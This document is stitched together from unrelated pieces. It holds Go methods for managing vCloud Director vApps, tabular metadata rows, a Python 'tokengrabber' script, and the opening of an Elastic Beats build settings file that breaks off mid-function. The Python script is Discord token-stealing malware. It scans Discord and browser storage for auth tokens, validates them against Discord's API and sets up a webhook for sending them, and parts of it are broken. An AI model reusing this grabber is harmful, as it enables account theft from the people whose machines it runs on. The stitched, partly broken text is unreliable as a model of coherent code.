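// Usage sketch (illustrative): compose a vApp and block until vCloud Director
// reports the composition task as finished.
//
//	task, err := vapp.ComposeVApp(networks, template, storageProfileRef, "web-01", "demo vApp")
//	if err == nil {
//		err = task.WaitTaskCompletion()
//	}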
func (v *VApp) PowerOn() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/power/action/powerOn"
req := v.c.NewRequest(map[string]string{}, "POST", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error powering on vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) PowerOff() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/power/action/powerOff"
req := v.c.NewRequest(map[string]string{}, "POST", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error powering off vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Reboot() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/power/action/reboot"
req := v.c.NewRequest(map[string]string{}, "POST", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error rebooting vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Reset() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/power/action/reset"
req := v.c.NewRequest(map[string]string{}, "POST", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error resetting vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Suspend() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/power/action/suspend"
req := v.c.NewRequest(map[string]string{}, "POST", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error suspending vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Shutdown() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/power/action/shutdown"
req := v.c.NewRequest(map[string]string{}, "POST", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error shutting down vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Undeploy() (Task, error) {
vu := &types.UndeployVAppParams{
Xmlns: "http://www.vmware.com/vcloud/v1.5",
UndeployPowerAction: "powerOff",
}
output, err := xml.MarshalIndent(vu, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
debug := os.Getenv("GOVCLOUDAIR_DEBUG")
if debug == "true" {
fmt.Printf("\n\nXML DEBUG: %s\n\n", string(output))
}
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/action/undeploy"
req := v.c.NewRequest(map[string]string{}, "POST", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.undeployVAppParams+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error undeploy vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Deploy() (Task, error) {
vu := &types.DeployVAppParams{
Xmlns: "http://www.vmware.com/vcloud/v1.5",
PowerOn: false,
}
output, err := xml.MarshalIndent(vu, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
debug := os.Getenv("GOVCLOUDAIR_DEBUG")
if debug == "true" {
fmt.Printf("\n\nXML DEBUG: %s\n\n", string(output))
}
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/action/deploy"
req := v.c.NewRequest(map[string]string{}, "POST", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.deployVAppParams+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error undeploy vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Delete() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
req := v.c.NewRequest(map[string]string{}, "DELETE", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error deleting vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) RunCustomizationScript(computername, script string) (Task, error) {
return v.Customize(computername, script, false)
}
func (v *VApp) Customize(computername, script string, changeSid bool) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
// Check if VApp Children is populated
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
vu := &types.GuestCustomizationSection{
Ovf: "http://schemas.dmtf.org/ovf/envelope/1",
Xsi: "http://www.w3.org/2001/XMLSchema-instance",
Xmlns: "http://www.vmware.com/vcloud/v1.5",
HREF: v.VApp.Children.VM[0].HREF,
Type: "application/vnd.vmware.vcloud.guestCustomizationSection+xml",
Info: "Specifies Guest OS Customization Settings",
Enabled: true,
ComputerName: computername,
CustomizationScript: script,
ChangeSid: changeSid,
}
output, err := xml.MarshalIndent(vu, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] VCD Client configuration: %s", output)
debug := os.Getenv("GOVCLOUDAIR_DEBUG")
if debug == "true" {
fmt.Printf("\n\nXML DEBUG: %s\n\n", string(output))
}
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/guestCustomizationSection/"
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.guestCustomizationSection+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) GetStatus() (string, error) {
err := v.Refresh()
if err != nil {
return "", fmt.Errorf("error refreshing vapp: %v", err)
}
return types.VAppStatuses[v.VApp.Status], nil
}
func (v *VApp) GetNetworkConnectionSection() (*types.NetworkConnectionSection, error) {
networkConnectionSection := &types.NetworkConnectionSection{}
if v.VApp.Children.VM[0].HREF == "" {
return networkConnectionSection, fmt.Errorf("cannot refresh, Object is empty")
}
u, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF + "/networkConnectionSection/")
req := v.c.NewRequest(map[string]string{}, "GET", *u, nil)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.networkConnectionSection+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return networkConnectionSection, fmt.Errorf("error retrieving task: %s", err)
}
if err = decodeBody(resp, networkConnectionSection); err != nil {
return networkConnectionSection, fmt.Errorf("error decoding task response: %s", err)
}
// The request was successful
return networkConnectionSection, nil
}
func (v *VApp) ChangeCPUcount(size int) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
// Check if VApp Children is populated
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
newcpu := &types.OVFItem{
XmlnsRasd: "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData",
XmlnsVCloud: "http://www.vmware.com/vcloud/v1.5",
XmlnsXsi: "http://www.w3.org/2001/XMLSchema-instance",
VCloudHREF: v.VApp.Children.VM[0].HREF + "/virtualHardwareSection/cpu",
VCloudType: "application/vnd.vmware.vcloud.rasdItem+xml",
AllocationUnits: "hertz * 10^6",
Description: "Number of Virtual CPUs",
ElementName: strconv.Itoa(size) + " virtual CPU(s)",
InstanceID: 4,
Reservation: 0,
ResourceType: 3,
VirtualQuantity: size,
Weight: 0,
Link: &types.Link{
HREF: v.VApp.Children.VM[0].HREF + "/virtualHardwareSection/cpu",
Rel: "edit",
Type: "application/vnd.vmware.vcloud.rasdItem+xml",
},
}
output, err := xml.MarshalIndent(newcpu, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
debug := os.Getenv("GOVCLOUDAIR_DEBUG")
if debug == "true" {
fmt.Printf("\n\nXML DEBUG: %s\n\n", string(output))
}
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/virtualHardwareSection/cpu"
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.rasdItem+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) ChangeStorageProfile(name string) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
vdc, err := v.c.retrieveVDC()
if err != nil {
return Task{}, fmt.Errorf("error retrieving VDC: %s", err)
}
storageprofileref, err := vdc.FindStorageProfileReference(name)
if err != nil {
return Task{}, fmt.Errorf("error retrieving storage profile %s: %s", name, err)
}
newprofile := &types.VM{
Name: v.VApp.Children.VM[0].Name,
StorageProfile: &storageprofileref,
Xmlns: "http://www.vmware.com/vcloud/v1.5",
}
output, err := xml.MarshalIndent(newprofile, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] VCD Client configuration: %s", output)
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.vm+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) ChangeVMName(name string) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
newname := &types.VM{
Name: name,
Xmlns: "http://www.vmware.com/vcloud/v1.5",
}
output, err := xml.MarshalIndent(newname, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] VCD Client configuration: %s", output)
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.vm+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) DeleteMetadata(key string) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/metadata/" + key
req := v.c.NewRequest(map[string]string{}, "DELETE", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error deleting Metadata: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) AddMetadata(key, value string) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
newmetadata := &types.MetadataValue{
Xmlns: "http://www.vmware.com/vcloud/v1.5",
Xsi: "http://www.w3.org/2001/XMLSchema-instance",
TypedValue: &types.TypedValue{
XsiType: "MetadataStringValue",
Value: value,
},
}
output, err := xml.MarshalIndent(newmetadata, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] NetworkXML: %s", output)
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/metadata/" + key
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.metadata.value+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM Network: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) SetOvf(parameters map[string]string) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
if v.VApp.Children.VM[0].ProductSection == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children with ProductSection, aborting customization")
}
for key, value := range parameters {
for _, ovf_value := range v.VApp.Children.VM[0].ProductSection.Property {
if ovf_value.Key == key {
ovf_value.Value = &types.Value{Value: value}
break
}
}
}
newmetadata := &types.ProductSectionList{
Xmlns: "http://www.vmware.com/vcloud/v1.5",
Ovf: "http://schemas.dmtf.org/ovf/envelope/1",
ProductSection: v.VApp.Children.VM[0].ProductSection,
}
output, err := xml.MarshalIndent(newmetadata, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] NetworkXML: %s", output)
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/productSections"
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.productSections+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM Network: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) ChangeNetworkConfig(networks []map[string]interface{}, ip string) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing VM before running customization: %v", err)
}
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
networksection, err := v.GetNetworkConnectionSection()
if err != nil {
return Task{}, fmt.Errorf("error retrieving network connection section: %s", err)
}
for index, network := range networks {
// Determine what type of address is requested for the vApp
ipAllocationMode := "NONE"
ipAddress := "Any"
// TODO: Review current behaviour of using DHCP when left blank
if ip == "" || ip == "dhcp" || network["ip"] == "dhcp" {
ipAllocationMode = "DHCP"
} else if ip == "allocated" || network["ip"] == "allocated" {
ipAllocationMode = "POOL"
} else if ip == "none" || network["ip"] == "none" {
ipAllocationMode = "NONE"
} else if ip != "" || network["ip"] != "" {
ipAllocationMode = "MANUAL"
// TODO: Check a valid IP has been given
ipAddress = ip
}
log.Printf("[DEBUG] Function ChangeNetworkConfig() for %s invoked", network["orgnetwork"])
networksection.Xmlns = "http://www.vmware.com/vcloud/v1.5"
networksection.Ovf = "http://schemas.dmtf.org/ovf/envelope/1"
networksection.Info = "Specifies the available VM network connections"
networksection.NetworkConnection[index].NeedsCustomization = true
networksection.NetworkConnection[index].IPAddress = ipAddress
networksection.NetworkConnection[index].IPAddressAllocationMode = ipAllocationMode
networksection.NetworkConnection[index].MACAddress = ""
if network["is_primary"] == true {
networksection.PrimaryNetworkConnectionIndex = index
}
log.Printf("Networksection: %s", networksection)
}
output, err := xml.MarshalIndent(networksection, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] NetworkXML: %s", output)
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/networkConnectionSection/"
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.networkConnectionSection+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM Network: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) ChangeMemorySize(size int) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
// Check if VApp Children is populated
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
newmem := &types.OVFItem{
XmlnsRasd: "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData",
XmlnsVCloud: "http://www.vmware.com/vcloud/v1.5",
XmlnsXsi: "http://www.w3.org/2001/XMLSchema-instance",
VCloudHREF: v.VApp.Children.VM[0].HREF + "/virtualHardwareSection/memory",
VCloudType: "application/vnd.vmware.vcloud.rasdItem+xml",
AllocationUnits: "byte * 2^20",
Description: "Memory Size",
ElementName: strconv.Itoa(size) + " MB of memory",
InstanceID: 5,
Reservation: 0,
ResourceType: 4,
VirtualQuantity: size,
Weight: 0,
Link: &types.Link{
HREF: v.VApp.Children.VM[0].HREF + "/virtualHardwareSection/memory",
Rel: "edit",
Type: "application/vnd.vmware.vcloud.rasdItem+xml",
},
}
output, err := xml.MarshalIndent(newmem, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
debug := os.Getenv("GOVCLOUDAIR_DEBUG")
if debug == "true" {
fmt.Printf("\n\nXML DEBUG: %s\n\n", string(output))
}
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/virtualHardwareSection/memory"
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.rasdItem+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) GetNetworkConfig() (*types.NetworkConfigSection, error) {
networkConfig := &types.NetworkConfigSection{}
if v.VApp.HREF == "" {
return networkConfig, fmt.Errorf("cannot refresh, Object is empty")
}
u, _ := url.ParseRequestURI(v.VApp.HREF + "/networkConfigSection/")
req := v.c.NewRequest(map[string]string{}, "GET", *u, nil)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.networkConfigSection+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return networkConfig, fmt.Errorf("error retrieving task: %s", err)
}
if err = decodeBody(resp, networkConfig); err != nil {
return networkConfig, fmt.Errorf("error decoding task response: %s", err)
}
// The request was successful
return networkConfig, nil
}
func (v *VApp) AddRAWNetworkConfig(orgvdcnetworks []*types.OrgVDCNetwork) (Task, error) {
networkConfig := &types.NetworkConfigSection{
Info: "Configuration parameters for logical networks",
Ovf: "http://schemas.dmtf.org/ovf/envelope/1",
Type: "application/vnd.vmware.vcloud.networkConfigSection+xml",
Xmlns: "http://www.vmware.com/vcloud/v1.5",
}
for _, network := range orgvdcnetworks {
networkConfig.NetworkConfig = append(networkConfig.NetworkConfig,
types.VAppNetworkConfiguration{
NetworkName: network.Name,
Configuration: &types.NetworkConfiguration{
ParentNetwork: &types.Reference{
HREF: network.HREF,
},
FenceMode: "bridged",
},
},
)
}
output, err := xml.MarshalIndent(networkConfig, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] RAWNETWORK Config NetworkXML: %s", output)
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/networkConfigSection/"
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.networkconfigsection+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error adding vApp Network: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
| [
"\"GOVCLOUDAIR_DEBUG\"",
"\"GOVCLOUDAIR_DEBUG\"",
"\"GOVCLOUDAIR_DEBUG\"",
"\"GOVCLOUDAIR_DEBUG\"",
"\"GOVCLOUDAIR_DEBUG\""
] | [] | [
"GOVCLOUDAIR_DEBUG"
] | [] | ["GOVCLOUDAIR_DEBUG"] | go | 1 | 0 | |
utils/tokengrabber.py |
import requests
import os
import json
import base64
import random
import re
import string
import datetime
import sqlite3
import pyautogui
import secrets
import shutil
import zipfile
import socket
#from Crypto.Cipher import AES
class Grabber:
def __init__(self):
self.tokens = []
self.valid = []
self.webhook = "WEBHOOK_HERE"
self.file = ""
self.username = os.getlogin()
self.appdata = os.getenv("localappdata")
self.roaming = os.getenv("appdata")
self.tempfolder = ""
self.ipaddress = ""
def GetIP_Info(self):
localip = socket.gethostbyname(socket.gethostname())
publicip_info = requests.get('http://ipinfo.io/json').json()
publicip = publicip_info["ip"]
publicip_hostname = publicip_info["hostname"]
publicip_city = publicip["city"]
publicip_region = publicip["region"]
def CreateTempFolder(self):
temp = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(10))
self.tempfolder = f"{self.appdata}\\{temp}"
os.mkdir(os.path.join(self.tempfolder))
def ScreenShot(self):
pass
def CheckGoogle(self):
if os.path.exists(f"{self.appdata}\\Google"):
return True
return False
def GrabToken(self):
tokens = []
paths = {
"Discord": f"{self.roaming}\\discord\\Local Storage\\leveldb\\",
"Discord Canary": f"{self.roaming}\\discordcanary\\Local Storage\\leveldb\\",
"Lightcord": f"{self.roaming}\\Lightcord\\Local Storage\\leveldb\\",
"Discord PTB": f"{self.roaming}\\discordptb\\Local Storage\\leveldb\\",
"Opera": f"{self.roaming}\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\",
"Opera GX": f"{self.roaming}\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\",
"Amigo": f"{self.appdata}\\Amigo\\User Data\\Local Storage\\leveldb\\",
"Torch": f"{self.appdata}\\Torch\\User Data\\Local Storage\\leveldb\\",
"Kometa": f"{self.appdata}\\Kometa\\User Data\\Local Storage\\leveldb\\",
"Orbitum": f"{self.appdata}\\Orbitum\\User Data\\Local Storage\\leveldb\\",
"CentBrowser": f"{self.appdata}\\CentBrowser\\User Data\\Local Storage\\leveldb\\",
"7Star": f"{self.appdata}\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\",
"Sputnik": f"{self.appdata}\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\",
"Vivaldi": f"{self.appdata}\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\",
"Chrome SxS": f"{self.appdata}\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\",
"Chrome": f"{self.appdata}\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\",
"Epic Privacy Browser": f"{self.appdata}\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\",
"Microsoft Edge": f"{self.appdata}\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\",
"Uran": f"{self.appdata}\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\",
"Yandex": f"{self.appdata}\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\",
"Brave": f"{self.appdata}\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\",
"Iridium": f"{self.appdata}\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\"
}
for platform , path in paths.items():
if not os.path.exists(path):
continue
for file in os.listdir(path):
if not file.endswith(".log") and not file.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f'{path}\\{file}', errors='ignore').readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in re.findall(regex, line):
tokens.append(token)
for token in tokens:
if token not in self.tokens and requests.get(f"https://discord.com/api/v9/users/@me", headers={"Authorization": token}).status_code == 200:
self.tokens.append(token)
Grabber().GrabToken() | [] | [] | [
"localappdata",
"appdata"
] | [] | ["localappdata", "appdata"] | python | 2 | 0 | |
dev-tools/mage/settings.go | // Licensed to Elasticsearch B.V. under one or more contributor
// license agreements. See the NOTICE file distributed with
// this work for additional information regarding copyright
// ownership. Elasticsearch B.V. licenses this file to you under
// the Apache License, Version 2.0 (the "License"); you may
// not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package mage
import (
"fmt"
"go/build"
"io/ioutil"
"log"
"os"
"path/filepath"
"regexp"
"strconv"
"strings"
"sync"
"time"
"github.com/magefile/mage/sh"
"github.com/pkg/errors"
"golang.org/x/tools/go/vcs"
"github.com/elastic/beats/v7/dev-tools/mage/gotool"
)
const (
fpmVersion = "1.11.0"
// Docker images. See https://github.com/elastic/golang-crossbuild.
beatsFPMImage = "docker.elastic.co/beats-dev/fpm"
// BeatsCrossBuildImage is the image used for crossbuilding Beats.
BeatsCrossBuildImage = "docker.elastic.co/beats-dev/golang-crossbuild"
elasticBeatsImportPath = "github.com/elastic/beats"
elasticBeatsModulePath = "github.com/elastic/beats/v7"
)
// Common settings with defaults derived from files, CWD, and environment.
var (
GOOS = build.Default.GOOS
GOARCH = build.Default.GOARCH
GOARM = EnvOr("GOARM", "")
Platform = MakePlatformAttributes(GOOS, GOARCH, GOARM)
BinaryExt = ""
XPackDir = "../x-pack"
RaceDetector = false
TestCoverage = false
// CrossBuildMountModcache, if true, mounts $GOPATH/pkg/mod into
// the crossbuild images at /go/pkg/mod, read-only.
CrossBuildMountModcache = true
BeatName = EnvOr("BEAT_NAME", filepath.Base(CWD()))
BeatServiceName = EnvOr("BEAT_SERVICE_NAME", BeatName)
BeatIndexPrefix = EnvOr("BEAT_INDEX_PREFIX", BeatName)
BeatDescription = EnvOr("BEAT_DESCRIPTION", "")
BeatVendor = EnvOr("BEAT_VENDOR", "Elastic")
BeatLicense = EnvOr("BEAT_LICENSE", "ASL 2.0")
BeatURL = EnvOr("BEAT_URL", "https://www.elastic.co/products/beats/"+BeatName)
BeatUser = EnvOr("BEAT_USER", "root")
BeatProjectType ProjectType
Snapshot bool
DevBuild bool
versionQualified bool
versionQualifier string
FuncMap = map[string]interface{}{
"beat_doc_branch": BeatDocBranch,
"beat_version": BeatQualifiedVersion,
"commit": CommitHash,
"commit_short": CommitHashShort,
"date": BuildDate,
"elastic_beats_dir": ElasticBeatsDir,
"go_version": GoVersion,
"repo": GetProjectRepoInfo,
"title": strings.Title,
"tolower": strings.ToLower,
"contains": strings.Contains,
}
)
func init() {
if GOOS == "windows" {
BinaryExt = ".exe"
}
var err error
RaceDetector, err = strconv.ParseBool(EnvOr("RACE_DETECTOR", "false"))
if err != nil {
panic(errors.Wrap(err, "failed to parse RACE_DETECTOR env value"))
}
TestCoverage, err = strconv.ParseBool(EnvOr("TEST_COVERAGE", "false"))
if err != nil {
panic(errors.Wrap(err, "failed to parse TEST_COVERAGE env value"))
}
Snapshot, err = strconv.ParseBool(EnvOr("SNAPSHOT", "false"))
if err != nil {
panic(errors.Wrap(err, "failed to parse SNAPSHOT env value"))
}
DevBuild, err = strconv.ParseBool(EnvOr("DEV", "false"))
if err != nil {
panic(errors.Wrap(err, "failed to parse DEV env value"))
}
